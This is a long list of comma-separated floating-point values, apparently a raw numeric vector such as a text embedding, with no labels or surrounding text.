-0.0025527055840939283, -0.014496847055852413, 0.05185249075293541, 0.005494094919413328, -0.005497596692293882, 0.01942717470228672, 0.048658981919288635, -0.012598950415849686, -0.0014523109421133995, -0.020001446828246117, 0.01374048925936222, -0.01648578606545925, -0.018460718914866447, 0.003974377177655697, -0.0009717089124023914, -0.012262791395187378, 0.0200294591486454, -0.009566518478095531, 0.049863550812006, -0.048855073750019073, -0.042748190462589264, 0.009657560847699642, -0.025520052760839462, -0.01760631613433361, -0.013810522854328156, -0.004797265864908695, -0.02609432488679886, 0.006845733150839806, 0.028013231232762337, 0.014468833804130554, -0.04033905267715454, 0.0004131951427552849, -0.02072979137301445, -0.035380709916353226, -0.019777340814471245, -0.001774463104084134, 0.010736070573329926, 0.015295224264264107, 0.03781786188483238, 0.020435651764273643, 0.00014925799041520804, -0.014804991893470287, 0.023166941478848457, -0.021318068727850914, 0.022998861968517303, -0.01245888415724039, 0.015715422108769417, 0.0293018389493227, -0.01127532497048378, -0.012619960121810436, -0.0002297960309078917, 0.0013428842648863792, -0.009874663315713406, -0.03919050842523575, 0.006257455330342054, 0.014468833804130554, -0.005725204013288021, -0.011800573207437992, 0.004244004376232624, -0.010434928350150585, 0.012886086478829384, -0.05235672742128372, 0.024819722399115562, 0.013082178309559822, -0.018880916759371758, -0.034316208213567734, 0.0026104829739779234, -0.039722759276628494, 0.0032985578291118145, 0.00016162320389412344, -0.0206877700984478, 0.060452550649642944, -0.05297302082180977, 0.00048410362796857953, -0.016555819660425186, -0.014440820552408695, -0.0035436737816780806, 0.006229442078620195, -0.0242734644562006, -0.012886086478829384, 0.002300586551427841, -0.03339176997542381, -0.004737737588584423, -0.018600784242153168, 0.004030403681099415, 0.022396577522158623, -0.0016632855404168367, -0.01764833554625511, 0.01794247329235077, -0.06913664937019348, 0.022158466279506683, -0.005896784830838442, -0.017200123518705368, -0.007696635089814663, -0.04610977694392204, 0.01593952812254429, -0.04342050850391388, -0.02301286906003952, -0.0004578412335831672, 0.005539616569876671, 0.001000597607344389, 0.023026876151561737, 0.004618681501597166, 0.017354195937514305, -0.01502909790724516, -0.008831171318888664, 0.03252336010336876, -0.013873551972210407, 0.015099131502211094, 0.006765195168554783, -0.010631021112203598, 0.0007405997603200376, 0.029217800125479698, 0.04406481236219406, 0.05120818689465523, 0.037761833518743515, 0.011751550249755383, -0.03378395736217499, -0.0003252160968258977, 0.01974932663142681, -0.008775144815444946, 0.004328044131398201, -0.02902170643210411, 0.015225190669298172, 0.01988939382135868, 0.01904899626970291, 0.02958197146654129, -0.01339732762426138, -0.025281939655542374, -0.010911153629422188, -0.003368590958416462, -0.006169913802295923, 0.020239559933543205, -0.0358569361269474, 0.021220022812485695, -0.03182303160429001, 0.00815184973180294, 0.03630514815449715, 0.014335771091282368, -0.03806998208165169, 0.025926245376467705, -0.04042309150099754, 0.05731507018208504, 0.04000289365649223, -0.05036778748035431, -0.0016895480221137404, 0.002307589864358306, -0.021304061636328697, 0.04560554027557373, -0.02194836549460888, -0.034820444881916046, -0.03711752966046333, 0.030478395521640778, 0.006173415575176477, -0.05804341286420822, -0.03977878764271736, 0.02916177362203598, -0.017634328454732895, -0.021402107551693916, 0.020995916798710823, -0.04473713040351868, 0.028125284239649773, -0.038658257573843, -0.002232304308563471, 0.012353834696114063, 0.005564128048717976, 0.029497932642698288, 0.028153296560049057, 0.0034578831400722265, 0.028265349566936493, -0.03171097859740257, 0.01878287084400654, 0.006891254801303148, -0.01910502277314663, -0.018418699502944946, 0.023587139323353767, 0.0185867790132761, -0.01938515529036522, -0.006996304262429476, -0.04459706321358681, 0.021121975034475327, -0.006821221671998501, 0.027733098715543747, -0.0033108138013631105, 0.019861379638314247, 0.011912626214325428, 0.023937305435538292, -0.00007019721670076251, 0.03215918689966202, 0.028853626921772957, -0.0199454203248024, 0.008095823228359222, -0.013474363833665848, -0.002447656122967601, -0.02263469062745571, -0.00873312447220087, -0.0157014150172472, -0.03697746619582176, -0.04546547308564186, -0.03742567449808121, 0.025127867236733437, -0.00359269673936069, 0.021920353174209595, -0.010280855931341648, -0.010476948693394661, 0.00848100520670414, -0.028965679928660393, -0.013887559063732624, -0.010532974265515804, 0.017858434468507767, -0.028055250644683838, -0.023923298344016075, -0.004107439890503883, -0.018012506887316704, -0.02333502098917961, 0.015169164165854454, -0.0034876472782343626, 0.00808181706815958, -0.0030166746582835913, 0.02367118000984192, -0.00025890354299917817, -0.017760388553142548, 0.005854765418916941, -0.012830059975385666, 0.007069839164614677, 0.0699770525097847, 0.008165856823325157, -0.0005707695963792503, -0.00716438377276063, -0.003883334109559655, -0.016751911491155624, 0.02236856520175934, 0.015365256927907467, -0.029413891956210136, 0.021864326670765877, -0.02823733724653721, 0.026570549234747887, -0.009608537890017033, -0.013166218064725399, 0.033755943179130554, -0.05557825043797493, -0.016891978681087494, -0.03162693604826927, 0.004839285742491484, 0.005038879811763763, 0.015393270179629326, -0.007220410276204348, 0.013159215450286865, 0.017032044008374214, -0.020351611077785492, 0.01896495744585991, 0.02986210398375988, 0.00924436654895544, 0.006597115658223629, -0.03689342364668846, -0.007759664673358202, 0.012598950415849686, 0.0011809327406808734, 0.025029821321368217, 0.03406408801674843, -0.014762972481548786, 0.006670650560408831, -0.002337354002520442, 0.029329853132367134, 0.005059889983385801, 0.017032044008374214, -0.025127867236733437, -0.03392402082681656, 0.010357892140746117, 0.007689632009714842, -0.03285951912403107, 0.025702139362692833, 0.009965706616640091, -0.010890142992138863, -0.024161411449313164, -0.017900453880429268, -0.019861379638314247, 0.024203430861234665, -0.004184476099908352, 0.02409137785434723, -0.011401385068893433, -0.020743796601891518, -0.01752227544784546, 0.002255065133795142, 0.028825614601373672, 0.028825614601373672, 0.009797627106308937, 0.020561711862683296, 0.010995193384587765, 0.021878333762288094, -0.01710207760334015, -0.020701777189970016, -0.003090209560468793, -0.012893089093267918, 0.008046800270676613, -0.0229148231446743, 0.0150010846555233, -0.012865075841546059, 0.0052104610949754715, 0.02627640962600708, 0.028909653425216675, -0.026612568646669388, 0.038658257573843, -0.04045110568404198, 0.02236856520175934, -0.029329853132367134, 0.03336375579237938, -0.015169164165854454, 0.008186866529285908, 0.011023206636309624, -0.0048708003014326096, 0.01822260580956936, -0.03134680539369583, 0.0156593956053257, 0.02449757046997547, -0.015099131502211094, 0.02874157391488552, 0.01952522248029709, 0.006450046319514513, 0.018390685319900513, 0.0061173890717327595, -0.0028906152583658695, 0.005045883357524872, 0.01334830466657877, -0.02277475595474243, -0.0065200794488191605, -0.001335005508735776, -0.010567991062998772, 0.0076546152122318745, -0.03171097859740257, -0.02818131074309349, 0.014945058152079582, -0.014889031648635864, 0.019273102283477783, 0.01798449456691742, 0.020463664084672928, 0.02222849801182747, 0.005305005703121424, 0.010792097076773643, -0.028573494404554367, -0.019511215388774872, 0.001852374873124063, -0.01397860236465931, 0.008803158067166805, 0.02185031957924366, 0.01844671182334423, -0.011674514040350914, -0.014903038740158081, 0.005168441217392683, 0.005080899689346552, -0.023419061675667763, -0.0037257596850395203, 0.011114249005913734, 0.004531139973551035, -0.022956842556595802, 0.002829336328431964, -0.010133786126971245, 0.025884225964546204, 0.006411528214812279, 0.009818637743592262, -0.008684101514518261, -0.03549276292324066, 0.05557825043797493, -0.006194425746798515, -0.04554951190948486, -0.017158104106783867, 0.024987801909446716, -0.014538866467773914, 0.04770653322339058, -0.051320239901542664, 0.017172111198306084, 0.00813084002584219, 0.026192370802164078, 0.04473713040351868, 0.00810282677412033, 0.007724648341536522, 0.015351250767707825, 0.02743895910680294, -0.0055045997723937035, -0.0061419010162353516, 0.032075148075819016, 0.031290777027606964, -0.008263902738690376, 0.0038693274836987257, -0.03078654035925865, 0.010589000768959522, 0.011233305558562279, -0.007906734012067318, -0.01718611642718315, -0.020463664084672928, -0.010589000768959522, -0.027522999793291092, 0.030030183494091034, -0.0027347917202860117, -0.02333502098917961, -0.014454826712608337, 0.0021447630133479834, 0.021135982125997543, -0.019063003361225128, -0.01630369946360588, 0.03596898913383484, -0.0013577662175521255, -0.0016807938227429986, -0.048238784074783325, -0.005105411168187857, -0.022816775366663933, 0.018110552802681923, -0.005462579894810915, 0.0024266461841762066, 0.011135258711874485, 0.023517107591032982, -0.0328034944832325, -0.005875775124877691, 0.016415752470493317, 0.011716533452272415, 0.04356057196855545, -0.014566879719495773, 0.02749498561024666, 0.02315293438732624, 0.001787594286724925, -0.017592309042811394, -0.04131951555609703, -0.02706078067421913, -0.01406964473426342, -0.012682990171015263, 0.020253565162420273, 0.007927744649350643, 0.003268793923780322, 0.010448935441672802, 0.00450662849470973, 0.020323598757386208, 0.02734091319143772, -0.02016952633857727, 0.021318068727850914, 0.007325459737330675, -0.014889031648635864, -0.02008548565208912, 0.0028345887549221516, 0.023082902655005455, -0.010091766715049744, 0.006905261427164078, 0.0186287984251976, -0.03731362149119377, -0.005774226970970631, 0.03325170651078224, -0.014818998984992504, -0.001330628409050405, -0.00485679367557168, -0.012395854108035564, -0.038602232933044434, 0.00750054232776165, 0.06190923973917961, -0.018194593489170074, 0.01584148220717907, 0.04652997478842735, -0.002885362831875682, 0.0007349096122197807, 0.0074515193700790405, 0.016051581129431725, -0.013859545812010765, 0.004261512774974108, -0.03232726827263832, -0.003963872324675322, 0.010035740211606026, -0.020337605848908424, -0.014622906222939491, 0.03479243069887161, -0.005707695614546537, -0.008775144815444946, 0.0054135569371283054, -0.0024721676018089056, 0.013054165057837963, 0.0047797574661672115, -0.03933057561516762, 0.013460357673466206, 0.0077736712992191315, -0.03451230004429817, 0.008922213688492775, -0.01752227544784546, -0.016990024596452713, 0.0008907332085072994, -0.000050500413635745645, -0.042468056082725525, -0.009048273786902428, -0.026444489136338234, -0.0050108665600419044, 0.02748097851872444, 0.005690187681466341, -0.0029431399889290333, 0.014468833804130554, 0.0200294591486454, 0.00848100520670414, -0.03697746619582176, 0.004650196060538292, 0.009461469016969204, 0.007689632009714842, 0.015925521031022072, 0.001805102569051087, 0.0163597259670496, 0.030534422025084496, 0.02030959166586399, 0.0077176447957754135, -0.009741600602865219, 0.017732374370098114, -0.036641307175159454, -0.024469556286931038, -0.027284886687994003, 0.0008233263506554067, -0.00032412182190455496, -0.038966402411460876, 0.024483563378453255, -0.007402495946735144, 0.022900816053152084, 0.024105384945869446, -0.009657560847699642, -0.009118306450545788, 0.00548709137365222, 0.03204713761806488, 0.024889755994081497, 0.005003863479942083, -0.008537031710147858, -0.015715422108769417, -0.007409499492496252, 0.015925521031022072, 0.003414112376049161, 0.004086430184543133, 0.002242809161543846, 0.006359003484249115, -0.012816052883863449, 0.008957230485975742, -0.00640452466905117, 0.014160688035190105, 0.02473568171262741, -0.05978023260831833, 0.002381124533712864, 0.02958197146654129, -0.022102439776062965, 0.00866309180855751, 0.02236856520175934, 0.0030394354835152626, 0.012493900954723358, -0.027845151722431183, 0.014076648280024529, -0.0016317706322297454, 0.027200846001505852, 0.005865270271897316, -0.01798449456691742, 0.014342773705720901, 0.012381847947835922, 0.01374048925936222, 0.016569826751947403, 0.0069297729060053825, -0.022298531606793404, 0.03327971696853638, -0.029469918459653854, -0.019595254212617874, -0.012991135939955711, 0.019371148198843002, 0.0049863550812006, -0.0062609571032226086, -0.02595425769686699, 0.01145741157233715, 0.011660506948828697, -0.025281939655542374, -0.01682194508612156, -0.024707669392228127, -0.028909653425216675, 0.01914704218506813, 0.0010828864760696888, -0.014125671237707138, 0.00813084002584219, -0.026248397305607796, 0.0030499405693262815, 0.003928855527192354, -0.01896495744585991, 0.019231082871556282, 0.020519690588116646, -0.012052692472934723, -0.026612568646669388, -0.006740683689713478, 0.012844066135585308, -0.003331823507323861, -0.0027102800086140633, -0.0039253537543118, -0.035520777106285095, 0.012472891248762608, -0.03448428586125374, 0.014139678329229355, 0.011933635920286179, -0.0075355591252446175, 0.007139872293919325, -0.008046800270676613, -0.0038728290237486362, 0.002048467518761754, 0.021304061636328697, 0.013607426546514034, 0.0199454203248024, -0.007696635089814663, -0.012094711884856224, -0.03241130709648132, 0.03610905259847641, -0.0036452217027544975, -0.028251342475414276, -0.03372792899608612, -0.0059983329847455025, 0.011149265803396702, -0.04123547673225403, -0.006243448704481125, -0.0017411973094567657, 0.019357142969965935, -0.005700692534446716, 0.028111277148127556, 0.0343722328543663, 0.01979134790599346, 0.022144459187984467, -0.014875025488436222, 0.01092515978962183, -0.012956119142472744, -0.020183533430099487, 0.02381124533712864, -0.0029729041270911694, 0.03610905259847641, -0.00751454895362258, -0.013054165057837963, -0.015057111158967018, 0.02902170643210411, -0.007045327685773373, -0.01304716244339943, -0.0328875333070755, 0.01980535313487053, -0.02040763758122921, -0.024679655209183693, 0.0036067033652216196, 0.029525944963097572, -0.008530029095709324, -0.013635439798235893, -0.018922938033938408, -0.022578664124011993, -0.00878214742988348, 0.0026034796610474586, 0.03669733181595802, -0.006593614351004362, 0.014482839964330196, -0.021696247160434723, 0.015967542305588722, 0.012269794940948486, -0.028153296560049057, 0.013355307281017303, -0.029525944963097572, -0.018894923850893974, 0.032271239906549454, 0.008396965451538563, 0.006513075903058052, -0.030338328331708908, -0.04888308793306351, 0.03792991489171982, 0.0066391355358064175, 0.002913376083597541, -0.010890142992138863, 0.006134897470474243, -0.0285594891756773, -0.01092515978962183, -0.018992969766259193, -0.03042236901819706, 0.0029991664923727512, -0.005875775124877691, -0.014622906222939491, 0.04378467798233032, 0.007584582082927227, -0.0016527805710211396, 0.005550121422857046, 0.011828586459159851, 0.011891616508364677, -0.02799922414124012, -0.05078798532485962, -0.02753700502216816, 0.0025719646364450455, -0.019959427416324615, 0.008677097968757153, -0.00992368720471859, 0.010049746371805668, 0.007395492866635323, 0.015645388513803482, -0.01553333643823862, 0.023068895563483238, 0.010764083825051785, -0.026402469724416733, -0.03176700323820114, -0.008004780858755112, 0.009727594442665577, -0.015239197760820389, -0.0032075149938464165, -0.005217464175075293, -0.007055832538753748, -0.018418699502944946, 0.030338328331708908, -0.019301116466522217, -0.02333502098917961, 0.006092877592891455, -0.03991885483264923, -0.024189423769712448, -0.023377040401101112, 0.006768696941435337, 0.04930328577756882, 0.0172281377017498, -0.01502909790724516, 0.011863603256642818, 0.0078507075086236, -0.009258372709155083, -0.0030569438822567463, -0.0179284680634737, -0.011114249005913734, -0.033755943179130554, 0.007605592254549265, -0.011821582913398743, -0.01784442737698555, 0.014622906222939491, -0.010308869183063507, -0.003417614148929715, 0.0356888547539711, 0.02455359697341919, 0.030674487352371216, 0.03739766404032707, -0.009097296744585037, -0.02114998921751976, -0.006516577675938606, 0.02487574890255928, -0.018432706594467163, 0.02263469062745571, -0.018614791333675385, -0.024707669392228127, -0.00626796018332243, 0.0032775478903204203, 0.014818998984992504, 0.03745368868112564, 0.003722257912158966, 0.06426235288381577, -0.0007086471887305379, -0.022620683535933495, -0.007934747263789177, -0.018040521070361137, 0.02100992202758789, -0.0014829504070803523, 0.0685763880610466, 0.009433455765247345, -0.019343135878443718, -0.032999586313962936, 0.0029448908753693104, 0.009475475177168846, 0.009097296744585037, -0.0021430121269077063, -0.016835952177643776, -0.02375521883368492, 0.02283078245818615, -0.04588567093014717, 0.02846144139766693, 0.0028328378684818745, -0.014468833804130554, -0.027200846001505852, -0.03392402082681656, -0.036361172795295715, -0.04159964621067047, -0.015575355850160122, 0.021135982125997543, -0.036557264626026154, 0.0055045997723937035, 0.017550289630889893, -0.007073340937495232, 0.036501239985227585, -0.022676710039377213, 0.024525582790374756, -0.013992608524858952, -0.008389962837100029, 0.003055192995816469, -0.011520440690219402, 0.02008548565208912, -0.004009393509477377, -0.030898593366146088, 0.005087902769446373, 0.04585765674710274, 0.02589823119342327, -0.0029466417618095875, 0.020715784281492233, -0.03507256507873535, 0.0143007542937994, 0.006607620976865292, 0.020799823105335236, -0.014160688035190105, -0.012353834696114063, 0.00934241246432066, 0.015449296683073044, 0.005396048538386822, -0.03042236901819706, -0.0019416670547798276, 0.02827935665845871, 0.006856238003820181, -0.011261318810284138, 0.01332029141485691, -0.025940250605344772, -0.015869494527578354, 0.00013667393068317324, 0.05232871323823929, 0.0023723705671727657, -0.040703222155570984, -0.021220022812485695, -0.00904127024114132, -0.010049746371805668, 0.007647612132132053, -0.0029904122930020094, 0.0019066504901275039, 0.009188340045511723, -0.0053925467655062675, -0.007521552499383688, 0.03638918697834015, -0.013733486644923687, -0.028069257736206055, -0.0023583639413118362, 0.013852542266249657, 0.014342773705720901, -0.000047956244088709354, 0.023068895563483238, -0.006600617431104183, -0.007983771152794361, 0.009321402758359909, -0.013103188946843147, -0.0399748794734478, -0.012626963667571545, -0.02100992202758789, 0.010469945147633553, -0.013761499896645546, 0.0002525567833799869, -0.013222244568169117, 0.015911515802145004, -0.030030183494091034, -0.0064640529453754425, -0.0013743991730734706, -0.024609623476862907, 0.008375955745577812, -0.00007156505307648331, -0.04201984405517578, -0.018110552802681923, -0.014307757839560509, -0.035660844296216965, -0.031374819576740265, -0.012942112982273102, -0.034596338868141174, 0.0067862048745155334, -0.007934747263789177, -0.012732013128697872, 0.03711752966046333, -0.014013618230819702, -0.024357503280043602, -0.02697674185037613, -0.017508268356323242, -0.01732618361711502, 0.0058232503943145275, 0.01055398490279913, 0.04938732460141182, 0.07445916533470154, 0.008852181024849415, -0.024903761222958565, -0.003349331906065345, 0.0044611068442463875, 0.015673402696847916, 0.03084256686270237, -0.012647973373532295, 0.0024354001507163048, 0.0527489148080349, 0.0009288136498071253, -0.00034359979326836765, 0.024861741811037064, -0.01117727905511856, -0.004408582113683224, -0.005080899689346552, -0.010967180132865906, -0.022256512194871902, 0.01794247329235077, -0.00838295929133892, -0.0022655699867755175, 0.009916683658957481, 0.0034508798271417618, -0.01728416234254837, 0.012626963667571545, -0.029385879635810852, -0.020463664084672928, -0.013215241953730583, -0.02194836549460888, -0.015295224264264107, 0.0054765865206718445, -0.02381124533712864, -0.02007148042321205, 0.01024583913385868, -0.015085124410688877, 0.005403051618486643, 0.01612161472439766, -0.0023180947173386812, -0.013726483099162579, -0.0025439513847231865, -0.007990773767232895, -0.014034628868103027, -0.031206738203763962, -0.002440652810037136, 0.01528121717274189, -0.02371319942176342, 0.010701053775846958, 0.007752661593258381, -0.0021570187527686357, 0.006015841383486986, -0.016877971589565277, -0.022956842556595802, 0.026388462632894516, 0.040283024311065674, 0.004082928411662579, 0.012059696018695831, -0.005616652779281139, -0.0034561322536319494, -0.01876886375248432, -0.01663985848426819, 0.007752661593258381, -0.005875775124877691, -0.005690187681466341, 0.03168296441435814, -0.010364895686507225, -0.020393632352352142, 0.007577579002827406, 0.025786178186535835, -0.005178946070373058, 0.029694024473428726, 0.005613151006400585, 0.0041389549151062965, 0.005529111251235008, -0.0019364145118743181, 0.007409499492496252, 0.030674487352371216, -0.017536282539367676, 0.003006169805303216, -0.010631021112203598, 0.006376511417329311, 0.0004836659354623407, 0.013936582021415234, -0.018460718914866447, 0.019721314311027527, 0.0035594310611486435, 0.017956480383872986, -0.0053855436854064465, 0.007395492866635323, -0.04328044131398201, -0.010813106782734394, 0.00513692619279027, -0.011597477830946445, 0.025281939655542374, 0.023503100499510765, 0.00836194958537817, 0.024189423769712448, 0.02082783728837967, -0.036361172795295715, -0.0064010233618319035, 0.004272017627954483, 0.008558042347431183, 0.0013008643873035908, 0.03703349083662033, 0.015155158005654812, -0.024721676483750343, 0.0065831090323626995, 0.0004814774147234857, 0.013530390337109566, 0.0015337243676185608, -0.011975656263530254, -0.03857421875, 0.00022115132014732808, 0.013775506056845188, -0.013313287869095802, -0.01395058911293745, 0.00039415492210537195, 0.007255426608026028, -0.012080705724656582, 0.00251068570651114, -0.014286747202277184, -0.021724259480834007, -0.011261318810284138, 0.03781786188483238, -0.028825614601373672, 0.005840758793056011, 0.011198288761079311, 0.005662174429744482, -0.017396215349435806, 0.030170248821377754, 0.036781370639801025, 0.0143007542937994, 0.0077176447957754135, 0.01974932663142681, 0.011072229593992233, 0.02893766760826111, -0.014959065243601799, 0.022956842556595802, -0.022802770137786865, -0.00452063512057066, 0.0018751355819404125, 0.0010216075461357832, 0.043112363666296005, 0.017172111198306084, 0.020939890295267105, -0.0015731180319562554, -0.007927744649350643, -0.010764083825051785, -0.005816246848553419, 0.01092515978962183, -0.03182303160429001, -0.006747686769813299, -0.01245888415724039, 0.006674152333289385, 0.02277475595474243, -0.0003260915109422058, 0.022718729451298714, 0.03423216938972473, -0.009146319702267647, 0.007227413356304169, 0.014412807300686836, 0.004597671329975128, 0.004426090512424707, -0.0021605202928185463, -0.0006640010979026556, -0.013600423000752926, 0.01059600431472063, -0.0033580861054360867, -0.04168368875980377, -0.018096547573804855, -0.01334830466657877, 0.01820860058069229, -0.0042510079219937325, -0.02395131252706051, 0.013726483099162579, 0.02902170643210411, 0.004860295448452234, -0.028993694111704826, 0.016709892079234123, 0.023124922066926956, -0.00896423403173685, -0.011282328516244888, 0.0199874397367239, 0.02213045209646225, 0.011331351473927498, 0.0002448969171382487, -0.041991833597421646, 0.0004322353925090283, 0.004678209312260151, -0.043028321117162704, -0.009958703070878983, 0.005718200467526913, 0.028209323063492775, -0.019511215388774872, -0.011128256097435951, -0.015393270179629326, -0.012479893863201141, -0.003855320857837796, 0.00467120623216033, -0.010953173041343689, -0.0199874397367239, -0.0022743241861462593, -0.012283802032470703, -0.0008784774108789861, -0.007213406730443239, 0.002790817990899086, -0.049275271594524384, 0.0016676626401022077, 0.02343306690454483, -0.018754858523607254, -0.006821221671998501, 0.006590112578123808, 0.016289694234728813, 0.015771448612213135, -0.006908763200044632, -0.00750054232776165, 0.039946865290403366, 0.00815184973180294, -0.023419061675667763, -0.019959427416324615, 0.002283078385517001, -0.01369846984744072, -0.0069577861577272415, 0.012514910660684109, -0.011331351473927498, -0.017970487475395203, -0.012045688927173615, 0.008880194276571274, -0.0193291287869215, 0.00018536880088504404, 0.006642637308686972, -0.028587501496076584, 0.003564683487638831, 0.003837812691926956, 0.004468110390007496, -0.011898620054125786, -0.02021154575049877, -0.0041109416633844376, 0.0039043440483510494, 0.005280493758618832, -0.010182809084653854, 0.009398438967764378, 0.009237363003194332, -0.006803713273257017, -0.002092238049954176, 0.005844260100275278, -0.00024358379596378654, -0.005424061790108681, 0.0106730405241251, -0.011541451327502728, 0.01732618361711502, 0.004678209312260151, -0.004310535732656717, -0.003316066227853298, 0.012626963667571545, -0.002158769639208913, 0.037285611033439636, 0.013243255205452442, 0.0066671487875282764, 0.02739693969488144, -0.004587166476994753, 0.010518968105316162, -0.008221883326768875, -0.019315121695399284, -0.005031876731663942, -0.010056749917566776, 0.04019898548722267, 0.011450408026576042, -0.0026472501922398806, 0.017900453880429268, -0.018334658816456795, -0.0058512636460363865, -0.00012025992327835411, 0.0006324862479232252, -0.001265847822651267, -0.005777728743851185, -0.016051581129431725, 0.006926271133124828, -0.0004626559966709465, -0.012360838241875172, 0.007927744649350643, -0.008025790564715862, 0.013278271071612835, 0.0075425622053444386, -0.041627660393714905, 0.008200873620808125, -0.021023929119110107, -0.029609983786940575, 0.018418699502944946, -0.030618460848927498, -0.012823056429624557, 0.019721314311027527, -0.0051299226470291615, 0.002065975684672594, -0.014482839964330196, 0.031206738203763962, 0.008354946039617062, -0.016737904399633408, 0.03933057561516762, 0.010469945147633553, -0.01556134968996048, 0.018796877935528755, 0.04031103849411011, 0.02557607926428318, 0.013593420386314392, -0.007731651421636343, 0.009699581190943718, 0.0008084443397819996, 0.012241781689226627, 0.009055276401340961, 0.015897508710622787, -0.00400589220225811, -0.018320653587579727, -0.021262042224407196, -0.01432876754552126, 0.004800767172127962, -0.004198482725769281, 0.004100436810404062, -0.01304716244339943, -0.024861741811037064, -0.012374844402074814, 0.016555819660425186, 0.013635439798235893, -0.05815546587109566, -0.025464026257395744, -0.006194425746798515, 0.02040763758122921, -0.014216714538633823, 0.009531501680612564, -0.005333018954843283, -0.016555819660425186, 0.01399961207062006, 0.023363035172224045, 0.02185031957924366, -0.018852904438972473, -0.005283995531499386, -0.037621770054101944, -0.0013656449737027287, 0.002223550109192729, -0.008565044961869717, -0.011492427438497543, -0.018250619992613792, 0.0199874397367239, -0.00873312447220087, 0.014314760453999043, 0.0018068533390760422, -0.0036942448932677507, 0.00873312447220087, 0.023166941478848457, 0.005704193841665983, -0.015057111158967018, -0.016891978681087494, -0.021500155329704285, -0.012823056429624557, -0.004044410306960344, 0.024623630568385124, 0.016247672960162163, 0.016527805477380753, 0.0020834840834140778, -0.003603201825171709, -0.02152816765010357, -0.017872441560029984, -0.021976379677653313, -0.00962254498153925, -0.014861018396914005, -0.00014849200670141727, 0.0030937111005187035, -0.042187925428152084, -0.004012895282357931, -0.00838295929133892, -0.009580524638295174, -0.013460357673466206, 0.004082928411662579, 0.03134680539369583, -0.014174695126712322, -0.00962254498153925, -0.013222244568169117, 0.018054526299238205, -0.02133207581937313, -0.0015433538937941194, 0.022816775366663933, 0.0150010846555233, -0.018012506887316704, -0.01788644678890705, 0.022760750725865364, -0.023138929158449173, 0.0021114973351359367, -0.014917044900357723, 0.008207876235246658, -0.005434566643089056, -0.02631843090057373, 0.011709530837833881, 0.022578664124011993, 0.004769252613186836, 0.020855849608778954, 0.021374095231294632, 0.021374095231294632, 0.017858434468507767, 0.01402062177658081, -0.02339104749262333, 0.0070208157412707806, 0.008523025549948215, 0.0054135569371283054, 0.011758553795516491, 0.0029431399889290333, 0.005700692534446716, -0.002792568877339363, -0.0028643528930842876, -0.0013770253863185644, 0.03899441659450531, -0.00810282677412033, 0.026402469724416733, -0.005868771579116583, 0.0039253537543118, -0.004499624948948622, -0.00558863952755928, 0.0046607013791799545, -0.016527805477380753, 0.007006809115409851, -0.0357728935778141, 0.017858434468507767, -0.02058972418308258, 0.011884612962603569, -0.007696635089814663, -0.021682240068912506, 0.014118668623268604, -0.005536114796996117, -0.010021733120083809, -0.02133207581937313, 0.019231082871556282, -0.01374048925936222, -0.014776979573071003, 0.011128256097435951, 0.013327294029295444, -0.004268515855073929, 0.015869494527578354, -0.018320653587579727, -0.0001449903502361849, -0.007857711054384708, -0.006789706647396088, 0.0036627298686653376, 0.003055192995816469, -0.02371319942176342, 0.015421283431351185, 0.005742712412029505, 0.006040352862328291, 0.0015249702846631408, -0.002407386898994446, -0.02166823297739029, -0.015015091747045517, -0.0018908930942416191, 0.028713561594486237, -0.010308869183063507, 0.005084401462227106, 0.019273102283477783, 0.012612957507371902, 0.017494263127446175, 0.012696996331214905, -0.01118428260087967, -0.0004046598623972386, -0.0015372260240837932, 0.012297808192670345, 0.007675625383853912, 0.023082902655005455, 0.017298169434070587, -0.012935109436511993, 0.01465091947466135, 0.011359364725649357, 0.005718200467526913, 0.0019469194812700152, -0.01437078695744276, 0.013579413294792175, -0.0029921631794422865, 0.007262430153787136, -0.019119029864668846, 0.007472529076039791, -0.002104494022205472, -0.027354920282959938, -0.026626575738191605, 0.009608537890017033, 0.009104300290346146, 0.001117027597501874, 0.016415752470493317, -0.009587528184056282, -0.014566879719495773, -0.006908763200044632, 0.0008071312331594527, -0.0031199734658002853, 0.02016952633857727, 0.005697190761566162, 0.018530752509832382, 0.007262430153787136, -0.01578545570373535, -0.010694051161408424, 0.002214796142652631, 0.001427799346856773, 0.013537393882870674, 0.000590904091950506, -0.0022918323520570993, 0.01243787445127964, -0.011737543158233166, 0.008123836480081081, -0.010869133286178112, 0.02655654214322567, -0.016331713646650314, 0.01439880020916462, -0.009776617400348186, -0.007864714600145817, 0.003610205138102174, -0.0008889823802746832, -0.014524860307574272, 0.00638351496309042, -0.007661618757992983, -0.013810522854328156, 0.018194593489170074, 0.0013411333784461021, 0.009482478722929955, -0.02505783550441265, 0.014482839964330196, -0.02879760041832924, 0.01271800696849823, 0.0053295171819627285, 0.014426813460886478, -0.008488008752465248, -0.019231082871556282, 0.020533697679638863, 0.01794247329235077, -0.0018401191337034106, 0.0010443682549521327, 0.0000026364991754235234, -0.02082783728837967, 0.000486292177811265, -0.015057111158967018, -0.005403051618486643, -0.009006253443658352, 0.009678571484982967, 0.02058972418308258, 0.0014838258503004909, -0.0053925467655062675, -0.0023513606283813715, -0.031178725883364677, 0.013558403588831425, -0.009538505226373672, 0.010196816176176071, 0.011520440690219402, -0.006432537920773029, -0.008067809976637363, -0.0006053483812138438, -0.010687047615647316, -0.012017675675451756, -0.0021447630133479834, 0.010729067027568817, 0.024119392037391663, -0.0017429481958970428, 0.001153794932179153, 0.005700692534446716, 0.023923298344016075, 0.00896423403173685, 0.001658033113926649, 0.01872684434056282, 0.01724214293062687, -0.0036907431203871965, 0.005196454469114542, 0.024847734719514847, 0.020239559933543205, 0.008095823228359222, 0.022438596934080124, -0.00037139415508136153, 0.0069227698259055614, -0.0027505489997565746, -0.0037257596850395203, -0.011429398320615292, 0.005399550311267376, -0.005760220345109701, -0.0033195677679032087, -0.001513589872047305, 0.0030954619869589806, -0.008677097968757153, 0.00357518857344985, 0.000268970790784806, -0.02044965885579586, 0.012514910660684109, -0.004937331657856703, -0.010112776421010494, -0.007206403650343418, -0.002617486286908388, -0.0003214955795556307, 0.021444128826260567, -0.030674487352371216, -0.020015453919768333, -0.0024686658289283514, 0.000691138906404376, -0.0012150738621130586, -0.007052330765873194, -0.0065270825289189816, -0.0033108138013631105, 0.008305923081934452, -0.009797627106308937, -0.005406553391367197, 0.004562654998153448, 0.0028643528930842876, 0.0049863550812006, 0.009454465471208096, 0.0035629328340291977, -0.02529594674706459, -0.007703638635575771, 0.004016397055238485, 0.042468056082725525, -0.010259845294058323, -0.010049746371805668, -0.025562072172760963, -0.0020817331969738007, 0.0015748688019812107, 0.0011546703753992915, 0.010217825882136822, 0.00419147964566946, 0.0015065865591168404, 0.02235455811023712, 0.01676591858267784, 0.008705111220479012, -0.02287280187010765, 0.0075705754570662975, 